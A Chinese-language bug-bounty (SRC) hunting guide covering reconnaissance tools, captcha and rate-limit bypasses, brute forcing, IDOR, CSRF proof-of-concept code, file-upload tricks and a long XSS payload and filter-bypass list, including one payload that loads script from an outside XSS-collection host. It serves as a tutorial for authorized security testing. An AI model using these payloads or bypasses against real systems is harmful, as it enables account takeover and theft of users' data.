SRC 漏洞挖掘实战指南与经验总结

之前常用 masscan+nmap 方式，Goby 可视化工具用起来更舒服，短时间可对常见端口进行扫描，还能对网站进行指纹识别。

实际端口扫描过程中，由于 CDN 或防火墙原因，没必要一上来就全端口扫描。经验表明，当扫描到 22 端口开放时，说明该 IP 没有 CDN 保护，对此类 IP 提取出来重点进行全端口扫描，有收获的可能性较大。

BBScan

猪猪侠师傅写的工具，速度很快，简单的目录扫描，主要是可以探测 C 段下面的很多资产，扩充攻击面。

项目地址：

• https://github.com/lijiejie/BBScan
• https://github.com/yhy0/BBScan（添加了 SpringBoot 的泄露探测）

功能：

• 可以对域名、IP、C 段进行探测
• 快速探测管理后台
• 进行端口探测
• 探测敏感信息泄露
• 可以自定义扫描规则

Report 下看报告，误报肯定会很多，但 C 段下很可能会有意想不到的资产。

JS 信息收集

主要是爬取网站的敏感 JS 文件，JS 中能收集到的信息：

• 增加攻击面 (URL、域名)
• 敏感信息 (密码、API 密钥、加密方式)
• 代码中的潜在危险函数操作
• 具有已知漏洞的框架

常用工具：

• JSFinder：速度很快。https://github.com/Threezh1/JSFinder
• Rad 爬虫：Xray 的 Rad 爬虫。https://github.com/chaitin/rad
• JSINFO-SCAN：能够匹配敏感信息。https://github.com/p1g3/JSINFO-SCAN

捡中低危漏洞的一些技巧

刚开始挖 SRC 往往不知道从哪下手，首先可以从各 SRC 平台提交漏洞下拉框里看一看收取的漏洞类型，然后针对性学习如何挖掘。

常见的漏洞类型包括：框架注入、明文密码传输、表单破解漏洞、IIS 短文件名泄露、老旧过期的 HTTPS 服务、跨目录下载漏洞、目录可浏览漏洞、LFI 本地文件包含漏洞、RFI 远程文件包含漏洞、HTTP 拒绝服务攻击、弱口令登录、CSRF 跨站点请求伪造、Flash 点击劫持、SQL 注入漏洞、XSS 跨站脚本漏洞、文件上传漏洞、解析漏洞、Cookies 注入漏洞、越权访问漏洞、命令执行漏洞、Struts2 远程代码执行漏洞、业务逻辑漏洞、用户隐私泄露、敏感信息泄漏、未验证的重定向和传递、JSONP 劫持等。

学习完基础的漏洞类型后，可多看一些实战的漏洞报告，如乌云漏洞库和 HackOne 上的报告。

• 乌云漏洞库：https://wooyun.x10sec.org/

这里列举一些经常遇到的漏洞类型。

登录框处常见的一些漏洞

通过对目标的前期信息收集之后，首当其冲的往往是各种奇奇怪怪的登录框。大型的企业为了减少安全问题，一般是用统一的登录接口登录不同的旗下网站，但是一些后台系统、运维系统或者一些边缘业务使用了独立的注册、登录体系，这个时候往往就会存在安全问题。

绕过限制导致的爆破、撞库、用户遍历漏洞

最常见的一种漏洞，尤其是一些老旧的后台系统，可能验证码抓个包就绕过去了。下面是一些常见的绕过姿势：

• 验证码不刷新
• 验证码抓包绕过
• 验证码删除绕过
• 验证码置空绕过
• 修改 XFF 头绕过：推荐 Burp 插件 FakeIP。https://github.com/TheKingOfDuck/burpFakeIP
• 账号后加空格绕过账号错误次数限制。

一般来说如果只是简单的验证码绕过，一般都是低危，所以一般能够绕过验证码的情况，都要尝试爆破一波账号密码。

弱口令漏洞

没有验证码或者验证码可以绕过的情况 直接上一手字典爆破，当然还是有一些小技巧：

• 比如可以设置固定的弱密码，比如 123456，然后爆破账号。
• 比如可以首先收集一些网站的信息针对性的制作字典，比如域名、员工邮箱、企业名称等等，推荐工具：白鹿社工字典生成。https://github.com/HongLuDianXue/BaiLu-SED-Tool

爆破的关键在于字典，常见的字典 GitHub 上都有，但是普通的弱口令现在确实不太好用了，要想提高成功的机率，还是需要碰一碰强密码。

有验证码且无法绕过的情况

• GitHub 直接找员工账号邮箱，密码。
• 源码或者 JS 文件查找线索，邮箱，或者加密的账号密码。
• 特定系统或者 CMS，搜索引擎搜索默认管理员或者测试密码。
• 手动尝试常见弱口令。

注册、登录、找回密码处的短信/邮箱轰炸漏洞

这个也挺常见的，一般可以对特定用户进行轰炸的是一定会收的，横向轰炸能够消耗资源的随缘收。常见的绕过姿势：

• 加空格绕过
• 加任意字母绕过
• 前面加 86 绕过
• XFF 头伪造 IP 绕过

逻辑缺陷导致的任意用户注册、登录、找回密码漏洞

因为这方面漏洞一旦出现基本都是高危，所以挖掘的时候类似的思路可以参考 FreeBuf 上的任意用户密码重置系列文章。

常见的信息泄露漏洞

敏感信息泄露的范围很广，一般就是两大类：

• 因为配置错误或者管理不当导致的企业内部信息泄露。
• 因为逻辑缺陷导致的用户资料泄露（遍历）。

GitHub 导致的信息泄露

GitHub 子域名监控项目：https://github.com/FeeiCN/GSIL

常见的泄露内容：

• 员工内部邮箱、登录账号、密码。
• 企业的一些内部系统域名、IP 泄露。
• 企业网站的工程代码、网站源码泄露，可以通过员工邮箱关键词查找，要注意日期，好几年的大概率不收了。

配置错误导致的信息泄露

包含的类型很多，最重要的是有一份足够强大的字典和一个好用的扫描器。

我在实际进行探测的时候，对于大批量的域名来说，更喜欢先用一份精简的小字典先进行快速扫描，比如备份文件的小字典、SpringBoot 泄露的小字典、网站后台的小字典。

比较出名的扫描器我们常见的 Dirsearch、Dirmap、Dirbuster 等等。可视化的比如 Test404 系列、御剑扫描器使用体验也不错。

注：信息泄露中比较常见的 Swagger-UI 服务泄露，可能直接提交会忽略或者低危，别忘了进一步测试泄露的接口功能。

越权导致的信息泄露

很多时候越权来来去去都是更改一个参数的问题，更多的时候还是要细心的一个一个测业务功能，注意观察和测试操作参数和对象参数。操作参数一般是增删改查对应特定业务的敏感操作，对象参数一般是用户或者物品等。

推荐几个 Burp 插件：

• 未授权检测：https://github.com/theLSA/burp-unauth-checker
• 敏感参数提取：https://github.com/theLSA/burp-sensitive-param-extractor
• 信息提取：https://github.com/theLSA/burp-info-extractor

插件的作用基本还是帮助我们快速定位敏感参数，实际测试还是需要我们一个包一个包仔细的分析程序逻辑。

常见的一些越权情况：

• 基于用户 ID 的越权
• 基于功能对象 ID 的越权
• 基于上传对象 ID 的越权
• 基于未授权访问的越权
• 基于功能地址的越权
• 基于接口身份的越权

其他的 OWASP Top 10 漏洞

CSRF 漏洞

CSRF 漏洞在挖掘中最重要的是说明危害，比较容易扯皮，一般来说涉及用户资料、财产、权限的 CSRF 漏洞大概率会收，一般来说最高就是中危。

常见的漏洞点

1. 修改个人资料、邮箱、密码、头像
2. 发表文章
3. 添加、删除评论
4. 添加、修改、删除收货地址
5. 添加管理员

(1) GET 型 GET 类型的 CSRF 利用非常简单，只需要一个 HTTP 请求，所以，一般会这样利用：

<img src=xxx/csrf?xx=11 />

(2) POST 型 POST 请求中没有 token 参数，然后请求也没有验证 referer 信息。这种是存在 CSRF 情况最多的一种。这种漏洞的检测方法也很简单，网页操作某功能，抓包后，如果发现没有 token 等参数，然后就将 referer 信息设置为空，再次发包请求，如果请求成功了，就说明这里有 CSRF 漏洞。

POC(可以用 Burp 自己生成的)：

<html>
    <body>
        <form>
            <input type="text">
        </form>
        <script>document.px.submit();</script>
    </body>
</html>

POST 请求数据为 JSON，当服务器没有严格校验 Content-Type 类型时，POC 为：

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.xxxx.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
xhr.send('{"role":admin}');
</script>

Flash 型

Flash CSRF 通常是由于 Crossdomain.xml 文件配置不当造成的，利用方法是使用 swf 来发起跨站请求伪造。

利用条件：

1. 目标站点下必须存在 crossdomain.xml 文件。
2. crossdomain.xml 中的配置允许其他域进行跨域请求。

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>

Bypass 小技巧

• 删除 CSRF Token
• 置空 CSRF Token
• 修改请求方法，如 POST 方法变 GET 请求
• 使用与 Token 相同长度的任意字符串替换 Token，例如尝试更改一个字符，看看或发生什么
• 使用固定 Token
• Token 字段改成 token[]=

任意文件上传漏洞

这个洞遇到的也比较多，一般来说是后端没有限制上传文件的类型。但是上传的脚本文件也不会解析，也就没有办法 GetShell。(很多 SRC 对于上传到 CDN 云服务器的任意文件上传是忽略的)。

• 上传含有 XSS 代码的 HTML 文件，造成存储型 XSS(如果上传到了 CDN 服务器之类的大概率忽略)。
• 上传恶意文件进行钓鱼
• 尝试在上传的文件名前加../进行目录穿越。
• 可以结合其他漏洞比如 CORS 漏洞扩大危害。

文件上传的常见的绕过姿势应该也挺熟悉的，实际测试的时候发现在进行申请企业、个人认证的时候，上传文件处常常有这个问题。

XSS 漏洞

老熟人了，不多说了，常见的姿势大家应该都知道。

Broken5 师傅的 xsspayload：

<script>alert(1)</script><script src=https://xsspt.com/VBAhTu></script><a href=javascript:alert(1)>xss</a><svg onload=alert(1)><img src=1 onerror=alert(1)><img src=https://www.baidu.com/img/bd_logo1.png onload=alert(1)><details open ontoggle=alert(1)><body onload=alert(1)><M onmouseover=alert(1)>M<iframe src=javascript:alert(1)></iframe><iframe onload=alert(1)><input type="submit" onfocus=alert(1)><input type="submit" onclick=alert(1)><form><input type="submit" formaction=javascript:alert(1)>

Bypass 姿势

<!-- 空格被过滤 --><img/src="1"/onerror=alert(1)><!-- 双写绕过 --><iimgmg src=1 oonerrornerror=aimglert(1)><!-- 大小写绕过  --><iMg src=1 oNerRor=alert(1)><!-- 利用 eval() --><img src=1 onerror="a=`aler`;b=`t(1)`;eval(a+b);"><img src=1 onerror=eval(atob('YWxlcnQoMSk='))><!-- 利用 location --><img src=1 onerror=location='javascript:%61%6C%65%72%74%28%31%29'><img src=1 onerror=location='javascript:\x61\x6C%65%72%74%28\x31%29'><img src=1 onerror=location="javascr"+"ipt:"+"%61%6C%65%72%74%28%31%29"><!-- 括号被过滤 --><img src=1 onerror="window.onerror=eval;throw'=alert\x281\x29';"><!-- onerror=被过滤 --><img src=1 onerror     =alert(1)><img src=1 onerror=alert(1)><!-- 属性被转换为大写 --><img src=1 onerror=alert(1)><!-- 编码后被检测 --><img src=1 onerror=alert(1)>

对于挖掘高危、严重级别漏洞的一些思考

这段时间看了很多牛叉的漏洞报告，想聊一聊我的思考。

1. 自动化信息收集的能力

这里说的信息收集更多的是如何利用已有的工具进行快速自动化的收集和整理，既要做到速度快，还要做到全面收集不遗漏信息，很多时候这个过程本身就是在发现漏洞。

这些工作应该在我们前期信息收集的阶段就应该全面的完成，所以如何快速化的进行全面的信息收集是我们需要思考和不断实践的。

2. 打漏洞组合拳的能力

SRC 对于漏洞评级主要是看你漏洞可以造成的危害，所以当挖到一些低危漏洞时，可以先不急着提交，找一找有没有其他可以利用的点打漏洞组合拳。

3. 绕 WAF 的能力

这个能力挺欠缺的。挖洞的过程基本遇到 WAF 就溜了，尤其是一些大厂的 WAF，绕其他 WAF 就是直接嫖一些其他的师傅的思路。

4. 细心和耐心和一些运气

心细挖天下，再加上一些运气，可能高危严重就到手了。

总结

挖 SRC 需要有一个好心态，国内 SRC 生态并不是很好，SRC 感觉更多的提供了一个相对安全的测试保障，所以更需要抱着一种学习的心态去挖，将我们学习的到的知识灵活运用，发现新的问题。不要想我今晚一定要挖到多少漏洞，要拿到多少奖金，不然可能会被忽略三连打崩心态。